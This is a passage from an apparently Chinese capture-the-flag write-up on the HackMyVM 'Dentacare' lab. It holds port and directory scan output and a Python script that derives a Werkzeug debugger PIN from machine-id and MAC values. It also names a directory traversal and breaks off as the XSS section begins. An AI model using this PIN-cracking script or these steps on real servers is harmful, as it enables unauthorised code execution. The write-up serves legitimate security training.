{"id":685,"date":"2024-05-28T21:02:04","date_gmt":"2024-05-28T13:02:04","guid":{"rendered":"http:\/\/162.14.82.114\/?p=685"},"modified":"2024-05-28T21:02:04","modified_gmt":"2024-05-28T13:02:04","slug":"hmv-_-dentacare","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/685\/05\/28\/2024\/","title":{"rendered":"hmv[-_-]Dentacare"},"content":{"rendered":"<h1>Dentacare<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101678.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101678.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528145900670\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101681.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101681.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528183651591\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/dentacare]\n\u2514\u2500$ rustscan -a 172.20.10.4 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 172.20.10.4:22\nOpen 172.20.10.4:80\nOpen 172.20.10.4:8000\nPORT     STATE SERVICE REASON  VERSION\n22\/tcp   open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)\n| ssh-hostkey: \n|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLuHH80SwA8Qff3pGOY4aBesL0Aeesw6jqX+pbtR9O7w8jlbyNhuHmjjABb\/34BxFp2oBx8o5xuZVXS1cE9nAlE=\n|   256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICKFE9s2IvPGAJ7Pt0kSC8t9OXYUrueJQQplSC2wbYtY\n80\/tcp   open  http    syn-ack Werkzeug\/3.0.2 Python\/3.11.2\n|_http-title: DentaCare Corporation\n|_http-server-header: Werkzeug\/3.0.2 Python\/3.11.2\n| http-methods: \n|_  Supported Methods: GET HEAD OPTIONS\n| fingerprint-strings: \n|   GetRequest: \n|     HTTP\/1.1 200 OK\n|     Server: Werkzeug\/3.0.2 Python\/3.11.2\n|     Date: Tue, 28 May 2024 10:37:48 GMT\n|     Content-Type: text\/html; charset=utf-8\n|     Content-Length: 43069\n|     Connection: close\n|     &lt;!DOCTYPE html&gt;\n|     &lt;html lang=&quot;en&quot;&gt;\n|     &lt;head&gt;\n|     &lt;title&gt;DentaCare Corporation&lt;\/title&gt;\n|     &lt;meta charset=&quot;utf-8&quot;&gt;\n|     &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1, shrink-to-fit=no&quot;&gt;\n|     &lt;link href=&quot;https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,400,500,600,700&quot; rel=&quot;stylesheet&quot;&gt;\n|     &lt;link rel=&quot;stylesheet&quot; href=&quot;..\/static\/css\/open-iconic-bootstrap.min.css&quot;&gt;\n|     &lt;link rel=&quot;stylesheet&quot; href=&quot;..\/static\/css\/animate.css&quot;&gt;\n|     &lt;link rel=&quot;stylesheet&quot; href=&quot;..\/static\/css\/owl.carousel.min.css&quot;&gt;\n|     &lt;link rel=&quot;stylesheet&quot; href=&quot;..\/static\/css\/owl.theme.default.min.css&quot;&gt;\n|     &lt;link rel=&quot;stylesheet&quot; href=&quot;..\/static\/css\/magnific-popup.css&quot;&gt;\n|     &lt;link rel=&quot;stylesheet&quot; href=&quot;..\/static\/css\/aos.css&quot;&gt;\n|     &lt;lin\n|   HTTPOptions: \n|     HTTP\/1.1 200 OK\n|     Server: Werkzeug\/3.0.2 Python\/3.11.2\n|     Date: Tue, 28 May 2024 10:37:48 GMT\n|     Content-Type: text\/html; charset=utf-8\n|     Allow: GET, HEAD, OPTIONS\n|     Content-Length: 0\n|     Connection: close\n|   RTSPRequest: \n|     &lt;!DOCTYPE HTML&gt;\n|     &lt;html lang=&quot;en&quot;&gt;\n|     &lt;head&gt;\n|     &lt;meta charset=&quot;utf-8&quot;&gt;\n|     &lt;title&gt;Error response&lt;\/title&gt;\n|     &lt;\/head&gt;\n|     &lt;body&gt;\n|     &lt;h1&gt;Error response&lt;\/h1&gt;\n|     &lt;p&gt;Error code: 400&lt;\/p&gt;\n|     &lt;p&gt;Message: Bad request version (&#039;RTSP\/1.0&#039;).&lt;\/p&gt;\n|     &lt;p&gt;Error code explanation: 400 - Bad request syntax or unsupported method.&lt;\/p&gt;\n|     &lt;\/body&gt;\n|_    &lt;\/html&gt;\n8000\/tcp open  http    syn-ack Apache httpd 2.4.57\n|_http-server-header: Apache\/2.4.57 (Debian)\n|_http-title: 403 Forbidden\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port80-TCP:V=7.94SVN%I=7%D=5\/28%Time=6655B3FB%P=x86_64-pc-linux-gnu%r(G\nSF:etRequest,A8ED,&quot;HTTP\/1\\.1\\x20200\\x20OK\\r\\nServer:\\x20Werkzeug\/3\\.0\\.2\\x\nSF:20Python\/3\\.11\\.2\\r\\nDate:\\x20Tue,\\x2028\\x20May\\x202024\\x2010:37:48\\x20\nSF:GMT\\r\\nContent-Type:\\x20text\/html;\\x20charset=utf-8\\r\\nContent-Length:\\\nSF:x2043069\\r\\nConnection:\\x20close\\r\\n\\r\\n&lt;!DOCTYPE\\x20html&gt;\\n&lt;html\\x20la\nSF:ng=\\&quot;en\\&quot;&gt;\\n\\x20\\x20&lt;head&gt;\\n\\x20\\x20\\x20\\x20&lt;title&gt;DentaCare\\x20Corpora\nSF:tion&lt;\/title&gt;\\n\\x20\\x20\\x20\\x20&lt;meta\\x20charset=\\&quot;utf-8\\&quot;&gt;\\n\\x20\\x20\\x20\nSF:\\x20&lt;meta\\x20name=\\&quot;viewport\\&quot;\\x20content=\\&quot;width=device-width,\\x20init\nSF:ial-scale=1,\\x20shrink-to-fit=no\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;link\\x20href=\\&quot;ht\nSF:tps:\/\/fonts\\.googleapis\\.com\/css\\?family=Open\\+Sans:300,400,500,600,700\nSF:\\&quot;\\x20rel=\\&quot;stylesheet\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;link\\x20rel=\\&quot;stylesheet\\&quot;\\\nSF:x20href=\\&quot;\\.\\.\/static\/css\/open-iconic-bootstrap\\.min\\.css\\&quot;&gt;\\n\\x20\\x20\\\nSF:x20\\x20&lt;link\\x20rel=\\&quot;stylesheet\\&quot;\\x20href=\\&quot;\\.\\.\/static\/css\/animate\\.c\nSF:ss\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;link\\x20rel=\\&quot;stylesheet\\&quot;\\x20href=\\&quot;\\.\\.\/stati\nSF:c\/css\/owl\\.carousel\\.min\\.css\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;link\\x20rel=\\&quot;styles\nSF:heet\\&quot;\\x20href=\\&quot;\\.\\.\/static\/css\/owl\\.theme\\.default\\.min\\.css\\&quot;&gt;\\n\\x20\nSF:\\x20\\x20\\x20&lt;link\\x20rel=\\&quot;stylesheet\\&quot;\\x20href=\\&quot;\\.\\.\/static\/css\/magni\nSF:fic-popup\\.css\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;link\\x20rel=\\&quot;stylesheet\\&quot;\\x20href=\nSF:\\&quot;\\.\\.\/static\/css\/aos\\.css\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;lin&quot;)%r(HTTPOptions,C7,\nSF:&quot;HTTP\/1\\.1\\x20200\\x20OK\\r\\nServer:\\x20Werkzeug\/3\\.0\\.2\\x20Python\/3\\.11\\\nSF:.2\\r\\nDate:\\x20Tue,\\x2028\\x20May\\x202024\\x2010:37:48\\x20GMT\\r\\nContent-\nSF:Type:\\x20text\/html;\\x20charset=utf-8\\r\\nAllow:\\x20GET,\\x20HEAD,\\x20OPTI\nSF:ONS\\r\\nContent-Length:\\x200\\r\\nConnection:\\x20close\\r\\n\\r\\n&quot;)%r(RTSPReq\nSF:uest,16C,&quot;&lt;!DOCTYPE\\x20HTML&gt;\\n&lt;html\\x20lang=\\&quot;en\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;h\nSF:ead&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;meta\\x20charset=\\&quot;utf-8\\&quot;&gt;\\n\\x20\nSF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;title&gt;Error\\x20response&lt;\/title&gt;\\n\\x20\\x20\\\nSF:x20\\x20&lt;\/head&gt;\\n\\x20\\x20\\x20\\x20&lt;body&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2\nSF:0&lt;h1&gt;Error\\x20response&lt;\/h1&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;p&gt;Error\\x\nSF:20code:\\x20400&lt;\/p&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;p&gt;Message:\\x20Bad\\\nSF:x20request\\x20version\\x20\\(&#039;RTSP\/1\\.0&#039;\\)\\.&lt;\/p&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x2\nSF:0\\x20\\x20&lt;p&gt;Error\\x20code\\x20explanation:\\x20400\\x20-\\x20Bad\\x20request\nSF:\\x20syntax\\x20or\\x20unsupported\\x20method\\.&lt;\/p&gt;\\n\\x20\\x20\\x20\\x20&lt;\/body\nSF:&gt;\\n&lt;\/html&gt;\\n&quot;);\nService Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/dentacare]\n\u2514\u2500$ gobuster dir -u http:\/\/172.20.10.4\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt            \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/172.20.10.4\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/blog                 (Status: 200) [Size: 23021]\n\/about                (Status: 200) [Size: 22975]\n\/contact              (Status: 500) [Size: 27322]\n\/services             (Status: 200) [Size: 21296]\n\/admin                (Status: 302) [Size: 189] [--&gt; \/]\n\/comment              (Status: 405) [Size: 153]\nProgress: 3573 \/ 220561 (1.62%)\n[!] Keyboard interrupt detected, terminating.\nProgress: 3574 \/ 220561 (1.62%)\n[ERROR] Get &quot;http:\/\/172.20.10.4\/Desktops&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/172.20.10.4\/newyork&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/172.20.10.4\/termsofservice&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/172.20.10.4\/530&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/172.20.10.4\/az&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>\u626b\u4e0d\u4e86\uff0c\u53e6\u5bfb\u4ed6\u6cd5\u5427\u3002\u3002\u3002<\/p>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101683.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101683.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528184119391\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u5b58\u5728\u7591\u4f3c\u57df\u540d\u89e3\u6790<code>Dentacare.hmv<\/code>\uff0c\u5c1d\u8bd5\u8fdb\u884c\u914d\u7f6e\uff1a<\/p>\n<pre><code class=\"language-apl\">172.20.10.4   dentacare.hmv<\/code><\/pre>\n<p>\u67e5\u770b\u5176\u4ed6\u914d\u7f6e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101684.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101684.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528184454756\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<h4>\u6846\u67b6\u6f0f\u6d1e<\/h4>\n<p>\u5148\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/dentacare]\n\u2514\u2500$ searchsploit flask 3.0.2             \nExploits: No Results\nShellcodes: No Results<\/code><\/pre>\n<p>\u6682\u65e0\u53ef\u4ee5\u5229\u7528\u7684\uff0c\u5c1d\u8bd5<code>google<\/code>\u4e00\u4e0b\uff0c\u4e5f\u6ca1\u53d1\u73b0\u5565\u3002<\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u662f\u5426\u5f00\u542f\u4e86<code>debug<\/code>\u6a21\u5f0f\uff1a<a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-web\/werkzeug\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-web\/werkzeug<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101685.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101685.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528184842078\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101686.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101686.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528184829657\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u786e\u5b9e\u5f00\u542f\u4e86\uff0c\u7b49\u4e0b\u53ef\u4ee5\u5c1d\u8bd5\u5229\u7528\u4e00\u4e0b\u3002<\/p>\n<h4>FUZZ<\/h4>\n<p>\u5148fuzz\u4e00\u4e0b\u57df\u540d\u53ca\u76ee\u5f55\uff0c\u4e0d\u77e5\u9053\u6709\u65e0\u53ef\u4ee5\u8fdb\u884c\u5229\u7528\u7684\uff0c\u4f46\u662ffuzz\u4e5f\u88ab\u62e6\u4e86\uff0c\u592a\u6162\u4e86\u3002<\/p>\n<h3>8000\u7aef\u53e3<\/h3>\n<p>\u5c1d\u8bd5\u770b\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u6709\u76f8\u5173\u51fa\u8def\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/dentacare]\n\u2514\u2500$ curl http:\/\/172.20.10.4:8000\/\n&lt;!DOCTYPE HTML PUBLIC &quot;-\/\/IETF\/\/DTD HTML 2.0\/\/EN&quot;&gt;\n&lt;html&gt;&lt;head&gt;\n&lt;title&gt;403 Forbidden&lt;\/title&gt;\n&lt;\/head&gt;&lt;body&gt;\n&lt;h1&gt;Forbidden&lt;\/h1&gt;\n&lt;p&gt;You don&#039;t have permission to access this resource.&lt;\/p&gt;\n&lt;hr&gt;\n&lt;address&gt;Apache\/2.4.57 (Debian) Server at 172.20.10.4 Port 8000&lt;\/address&gt;\n&lt;\/body&gt;&lt;\/html&gt;<\/code><\/pre>\n<h3>\u5c1d\u8bd5\u7206\u7834pin<\/h3>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\u8fd9\u4e2a\u811a\u672c\uff1a<\/p>\n<pre><code class=\"language-bash\">import hashlib\nfrom itertools import chain\nprobably_public_bits = [\n    &#039;dentacare&#039;,  # username\n    &#039;flask.app&#039;,  # modname\n    &#039;Flask&#039;,  # getattr(app, &#039;__name__&#039;, getattr(app.__class__, &#039;__name__&#039;))\n    &#039;\/opt\/appli\/env\/lib\/python3.11\/site-packages\/flask\/app.py&#039;  # getattr(mod, &#039;__file__&#039;, None),\n]\n\nprivate_bits = [\n    &#039;279275995014060&#039;,  # str(uuid.getnode()),  \/sys\/class\/net\/ens33\/address\n    &#039;d4e6cb65d59544f3331ea0425dc555a1&#039;  # get_machine_id(), \/etc\/machine-id\n]\n\n# h = hashlib.md5()  # Changed in https:\/\/werkzeug.palletsprojects.com\/en\/2.2.x\/changes\/#version-2-0-0\nh = hashlib.sha1()\nfor bit in chain(probably_public_bits, private_bits):\n    if not bit:\n        continue\n    if isinstance(bit, str):\n        bit = bit.encode(&#039;utf-8&#039;)\n    h.update(bit)\nh.update(b&#039;cookiesalt&#039;)\n# h.update(b&#039;shittysalt&#039;)\n\ncookie_name = &#039;__wzd&#039; + h.hexdigest()[:20]\n\nnum = None\nif num is None:\n    h.update(b&#039;pinsalt&#039;)\n    num = (&#039;%09d&#039; % int(h.hexdigest(), 16))[:9]\n\nrv = None\nif rv is None:\n    for group_size in 5, 4, 3:\n        if len(num) % group_size == 0:\n            rv = &#039;-&#039;.join(num[x:x + group_size].rjust(group_size, &#039;0&#039;)\n                          for x in range(0, len(num), group_size))\n            break\n    else:\n        rv = num\n\nprint(rv)<\/code><\/pre>\n<p>\u5148\u627e\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u76f8\u5173\u4fe1\u606f\u7684\u5185\u5bb9\uff0c\u627e\u5230\u51e0\u4e2a\u7528\u6237\u540d\uff1a<\/p>\n<pre><code class=\"language-apl\">green\nadmin\ntom\nmark\nmark\npatrick\nlvan\ndentacare<\/code><\/pre>\n<p>\u7136\u540e\u627e\u5230\u4e86\u76ee\u5f55<code>\/opt\/appli\/env\/lib\/python3.11\/site-packages\/flask\/app.py<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101687.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101687.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528194649962\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u8fd8\u53d1\u73b0\u4e86\u4e00\u4e2a\u76ee\u5f55\u7a7f\u8d8a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101688.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101688.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528191217507\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101689.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101689.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528191249822\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f46\u662f\u5176\u4ed6\u7684\u6587\u4ef6\u65e0\u6cd5\u8fdb\u884c\u914d\u7f6e\u8bfb\u53d6\u3002\u53ef\u4ee5\u53c2\u8003<code>zeug<\/code>\u9776\u573a\uff0c\u5c1d\u8bd5\u8fdb\u884c\u7834\u89e3\uff0c\u4f46\u662f\u6211\u8fd9\u8fb9\u5077\u770b\u4e86\u4e00\u4e0bwp\u53d1\u73b0\u4e0d\u662f\u8fd9\u4e2a\u601d\u8def\uff08\u8fd9\u4e2a\u601d\u8def\u4e0b\u7684\u9776\u673a\u53ef\u80fd\u9700\u8981\u91cd\u65b0\u5bfc\u5165\u9776\u673a\uff0c\u4fee\u6539mac\u5730\u5740\uff0c\u5426\u5219\u5373\u4f7f\u53ef\u4ee5rce\u4e5f\u51fa\u4e0d\u6765\uff0c\u6240\u4ee5\u6211\u5c31\u5077\u770b\u4e86\u4e00\u4e0b\uff09<\/p>\n<h3>XSS\u8fdb\u884c\u5229\u7528\uff08\u6b63\u786e\u601d\u8def\uff09<\/h3>\n<p>\u8fd9\u786e\u5b9e\u6ca1\u60f3\u5230\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101690.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101690.png\" 